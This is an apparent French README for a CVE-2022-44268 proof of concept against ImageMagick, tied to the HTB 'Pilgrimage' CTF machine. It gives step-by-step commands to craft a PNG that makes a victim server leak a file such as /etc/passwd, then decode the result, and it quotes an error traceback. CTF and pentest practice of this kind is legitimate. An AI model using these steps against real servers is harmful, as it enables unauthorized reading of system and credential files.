
Preuve de concept pour CVE-2022-44268 permettant la lecture arbitraire de fichiers via des images PNG spécialement conçues traitées par ImageMagick. Inclut des scripts de génération et de décodage pour les tests d'intrusion et les défis CTF.
également utilisé dans htb pilgrimage
Les chercheurs de MetabaseQ ont découvert CVE-2022-44268, c'est-à-dire qu'ImageMagick 7.1.0-49 est vulnérable à la divulgation d'informations. Lorsqu'il analyse une image PNG (par exemple pour un redimensionnement), l'image résultante peut contenir le contenu d'un fichier distant arbitraire (si le binaire ImageMagick a les permissions de le lire).
Étape 1 :
exécutez
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
Étape 2 :
exécutez
python3 magick_exploit.py generate -l [local_file] -o [output_file]
ici, dans ce cas, le fichier local est '/etc/passwd' que je veux obtenir depuis la machine victime.
Étape 3 :
téléversez le fichier image sur le site Web.
Étape 4 :
récupérez le fichier image converti depuis le site Web. nommez-le 'downloaded_image.png'
Étape 5 :
exécutez
python3 decode_profile.py

si vous obtenez une erreur comme celle-ci :
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
Cela signifie que le fichier que vous avez mentionné n'existe pas. Utilisez /etc/passwd pour vérifier.